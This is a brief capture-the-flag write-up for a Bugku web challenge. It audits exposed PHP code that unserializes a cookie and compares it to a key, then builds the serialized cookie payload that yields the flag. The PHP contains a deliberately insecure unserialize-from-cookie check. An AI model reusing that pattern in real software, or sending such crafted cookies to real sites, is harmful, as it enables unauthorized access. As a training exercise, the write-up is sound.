0. Open the web page and view the source code
The prompt message was found in the CSS file: /* try ?19492 */
1. Visit ?19492 to view the PHP source code
2. Code audit
<?php
error_reporting(0);
$KEY='ctf.bugku.com';
include_once("flag.php");
$cookie = $_COOKIE['BUGKU'];
if(isset($_GET['19492'])){
show_source(__FILE__);
}
elseif (unserialize($cookie) === "$KEY")
{
echo "$flag";
}
else {
?>
$KEY='ctf.bugku.com'; assign ctf.bugku.com to the variable KEY
$cookie = $_COOKIE['BUGKU']; Receive the variable BUGKU in cookie mode and assign it to the variable cookie
elseif (unserialize($cookie) === "$KEY") If the result of cookie deserialization is equal to the variable KEY, that is, unserialize($cookie) === "ctf.bugku.com",
{
echo "$flag "; then output flag
}
3. Construct the payload
Just serialize ctf.bugku.com
BUGKU=s:13:"ctf.bugku.com";
The final payload: BUGKU=s:13:"ctf.bugku.com"
4. Upload the payload, there are two methods here
(1) Upload using hackbar
(2) Use BurpSuite to capture the package and upload it